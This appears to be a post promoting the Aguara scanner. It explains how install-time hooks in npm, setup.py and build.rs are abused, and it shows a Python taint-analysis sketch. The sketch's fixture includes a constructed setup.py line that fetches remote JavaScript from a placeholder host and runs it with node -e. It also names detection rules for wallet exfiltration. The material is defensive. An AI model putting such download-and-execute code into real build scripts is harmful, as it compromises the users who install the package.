The code you audit is the code your application runs. The code that attacks you is increasingly the code your package manager runs first: npm lifecycle hooks, Python's setup.py, Rust's build.rs. All three execute at install or build time, before any test, before any review of behavior, often inside CI with credentials in the environment.
Same moment, three dialects
In JavaScript, the hook is declared in package.json and the payload hides in package code: obfuscator-shaped blobs, install-time daemonization, CI secret harvesting. Aguara's jsrisk analyzer has covered those shapes since the spring releases.
In Python, the classic move is a setup.py that fetches remote JavaScript and hands it to node -e: a cross-runtime hop that defeats single-ecosystem analysis. In Rust, build.rs runs arbitrary code at build time, and the observed malicious pattern reads wallet and keystore files, then ships them to a network sink.
Why co-presence rules were not enough
The first versions of these detections were co-presence rules: flag a file that contains both a fetch and an execution call. That shape is cheap and wrong in both directions. Plenty of legitimate build scripts download things and separately run things; and a payload can put ten lines between the two and dodge a regex window.
v0.22.0 replaced both with flow-sensitive single-pass analyzers. PY_IMPORTTIME_REMOTE_JS_001 fires only when the value produced by a remote fetch actually reaches the execution sink, tracked through assignments, up to two hops, with taint cleared on safe reassignment. RS_BUILD_WALLET_EXFIL_001 requires the wallet read to reach the network send. The variable in between no longer fools the rule, and the legitimate download-here-run-that-other-thing script no longer trips it.
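As an added example, not Aguara's own code, here is a simplified Python sketch of the flow-sensitive idea in the paragraph above: taint starts at a remote fetch, follows assignments for at most MAX_HOPS hops, is cleared by a safe reassignment, and the rule fires only when an execution sink consumes a tainted variable. The source and sink call names, the hop cap and the setup.py fragments are assumptions constructed here; the old co-presence rule is included for contrast.

```python
import ast

# Constructed setup.py fragments for three cases (not taken from any real package).
MALICIOUS = """resp = urllib.request.urlopen("https://example.invalid/p.js")
payload = resp.read().decode()
subprocess.run(["node", "-e", payload])"""
BENIGN = """data = urllib.request.urlopen("https://example.invalid/VERSION").read()
open("VERSION", "wb").write(data)
subprocess.run(["node", "-e", "console.log('build ok')"])"""
REASSIGNED = """code = urllib.request.urlopen("https://example.invalid/p.js").read()
code = "console.log('safe')"
subprocess.run(["node", "-e", code])"""

FETCH_CALLS = {"urlopen", "get"}                         # assumed source names
EXEC_CALLS = {"run", "Popen", "check_output", "system"}  # assumed sink names
MAX_HOPS = 2  # assignments a tainted value may travel after the fetch (assumed cap)

def _calls(node):
    """Names of every call below `node`: urllib.request.urlopen(x).read() -> urlopen, read."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Call):
            f = sub.func
            yield f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", "")

def _names(node):
    return {n.id for n in ast.walk(node) if isinstance(n, ast.Name)}

def co_presence(source):
    """The old rule: any file containing both a fetch and an exec call is flagged."""
    calls = set(_calls(ast.parse(source)))
    return bool(calls & FETCH_CALLS) and bool(calls & EXEC_CALLS)

def remote_fetch_reaches_exec(source):
    """Single pass over top-level statements; `tainted` maps variable -> hops from the fetch."""
    tainted = {}
    for stmt in ast.parse(source).body:
        expr = getattr(stmt, "value", stmt)  # right-hand side for Assign/Expr nodes
        if set(_calls(expr)) & EXEC_CALLS and _names(expr) & tainted.keys():
            return True  # a fetched value flows into the execution sink
        if isinstance(stmt, ast.Assign) and isinstance(stmt.targets[0], ast.Name):
            target = stmt.targets[0].id
            hops = [tainted[n] + 1 for n in _names(stmt.value) if n in tainted]
            if set(_calls(stmt.value)) & FETCH_CALLS:
                hops = [0]  # fresh taint straight from the network
            if hops and min(hops) <= MAX_HOPS:
                tainted[target] = min(hops)  # taint follows the assignment
            else:
                tainted.pop(target, None)  # safe reassignment clears the taint
    return False
```

The benign fragment trips co_presence but not the flow-sensitive check, which is exactly the false positive the paragraph describes.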
The general principle
Install-time execution deserves a different trust bar than runtime code, because nobody watches it run and everybody gives it credentials. The practical posture: gate it where your package manager allows (pnpm v11 does this well), check lockfiles against advisories before install, and scan the install path itself for behavioral shapes. One command covers the three languages:
$ aguara scan .
CRITICAL setup.py
PY_IMPORTTIME_REMOTE_JS_001: remote fetch reaches node -e
Scan the install path, not just the code
aguara scan . covers package code in JavaScript, Python and Rust, before install runs it.